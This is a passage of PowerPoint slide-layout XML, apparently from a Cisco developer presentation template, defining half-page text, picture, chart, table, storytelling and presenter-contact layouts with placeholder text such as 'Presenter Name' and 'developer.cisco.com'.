            <a:ext cx="3551237" cy="4059237"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="169859" indent="-169859">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="228594" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="2400"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="346067" indent="-171446">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2400"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="457189" indent="-117472">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2000"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="574661" indent="-117472">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst/>
              <a:defRPr sz="1800"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="744520" indent="-112710">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar cha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p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477680" y="4741655"/>
            <a:ext cx="3466792"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26963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3_Half_Page_Text_2 column">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mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="437767"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5097464" y="510540"/>
            <a:ext cx="3551237" cy="4080510"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="114297" indent="-114297">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:defRPr sz="2000"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="228594" indent="-114297">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:defRPr sz="2000"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="342892" indent="-114297">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:defRPr sz="1800"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="457189" indent="-123822">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:defRPr sz="1600"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="574661" indent="-117472">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buSzPct val="60000"/>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37767" y="1659843"/>
            <a:ext cx="3808797" cy="2931208"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="114297" indent="-114297">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:defRPr lang="en-US" sz="2000" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="CiscoSans"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="228594" indent="-114297">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="342892" indent="-114297">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="457189" indent="-123822">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="574661" indent="-117472">
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg1">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4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477679" y="4741655"/>
            <a:ext cx="3359215"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364426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2675">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4_Half_Page_Picture_Caption">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5089526" y="531813"/>
            <a:ext cx="3559175" cy="3364846"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5089526" y="4062351"/>
            <a:ext cx="3559175" cy="525145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1400"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477680" y="4741655"/>
            <a:ext cx="2863168"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1068700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5_Half_Page_Picture">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endParaRPr>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5089526" y="531814"/>
            <a:ext cx="3559175" cy="4059236"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477679" y="4741655"/>
            <a:ext cx="3263592"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319832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6_Half_Page_Headline Only">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8" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477679" y="4741655"/>
            <a:ext cx="2946839"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126314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7_Half_Page_Picture_Full">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4580093" y="0"/>
            <a:ext cx="4563907" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click icon to add picture</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477679" y="4741655"/>
            <a:ext cx="32994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415395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8_Half_Page_Chart">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Chart Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="chart" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5089526" y="503238"/>
            <a:ext cx="3559175" cy="4087812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click icon to add chart</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477679" y="4741655"/>
            <a:ext cx="3179921"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144116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96466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9_Half_Page_Table">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Table Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="tbl" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5089526" y="503238"/>
            <a:ext cx="3559175" cy="4087812"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click icon to add table</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="477679" y="4741655"/>
            <a:ext cx="3407027"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3747073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cSld name="Storytelling">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="Straight Connector 4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4610100" y="609601"/>
            <a:ext cx="0" cy="3984625"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100" cap="flat"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p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="463764" y="1439061"/>
            <a:ext cx="3820348" cy="2265389"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="61715" tIns="34288" rIns="61715" bIns="34288" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="685731" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx1"/>
              </a:buClr>
              <a:buFont typeface="Ciscolight" pitchFamily="2" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4000" b="0" kern="1200" spc="0" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4922521" y="654518"/>
            <a:ext cx="3865880" cy="3840480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="45710" rIns="91420" bIns="45710" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1600" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="1500"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="1500"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="1500"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="1500"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8409709" y="4884990"/>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640853F4-1BAF-3540-A54F-96D28F764CCD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="389470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ocial Media Contac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5A1BC9F-B5AD-B147-BA51-6B169F6BC974}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4177122" y="1422400"/>
            <a:ext cx="2083902" cy="1959304"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Presenter</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7D4E213-7CF4-6941-B2D0-5FF593988BFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6385568" y="1883898"/>
            <a:ext cx="2397686" cy="1497806"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Presenter Name</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Presenter Title</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Twitter Handle</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GitHub Link</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linked In Link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FB00F3A-25D3-4F4B-BAFF-D5F7DBFC5ABF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>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a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="815769" y="1163125"/>
            <a:ext cx="2569136" cy="1859621"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B81C284A-AD2A-AD43-8CC9-F51A6C7BC078}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6509108" y="4313198"/>
            <a:ext cx="2411488" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="42862" lvl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="450"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D3A5C"/>
                </a:solidFill>
                <a:latin typeface="CiscoSans ExtraLight" panose="020B0303020201020303" pitchFamily="34" charset="0"/>
                <a:cs typeface="CiscoSansTT Heavy" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>developer.cisco.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0D3A5C"/>
              </a:solidFill>
              <a:latin typeface="CiscoSans ExtraLight" panose="020B0303020201020303" pitchFamily="34" charset="0"/>
              <a:cs typeface="CiscoSansTT Heavy" panose="020B0503020201020303" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7698D641-4E2F-B74D-8F84-F7779A22E4CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="437766" y="496343"/>
            <a:ext cx="6574156" cy="41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8" tIns="34284" rIns="68568" bIns="34284" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" defTabSz="912261" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr lang="en-US" sz="3733" b="0" i="0" u="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="CiscoSansTT Thin" charset="0"/>
                <a:cs typeface="CiscoSansTT Thin" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr defTabSz="912261" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="4267">
                <a:solidFill>
                  <a:srgbClr val="676767"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr defTabSz="912261" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="4267">
                <a:solidFill>
                  <a:srgbClr val="676767"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr defTabSz="912261" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="4267">
                <a:solidFill>
                  <a:srgbClr val="676767"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr defTabSz="912261" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="4267">
                <a:solidFill>
                  <a:srgbClr val="676767"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="609585" defTabSz="912261" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="4267">
                <a:solidFill>
                  <a:srgbClr val="676767"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="1219170" defTabSz="912261" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="4267">
                <a:solidFill>
                  <a:srgbClr val="676767"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="1828754" defTabSz="912261" fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr sz="4267">
                <a:solidFill>
                  <a:srgbClr val="676767"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="2438339" defTabSz="912261" fontAlgn="base">
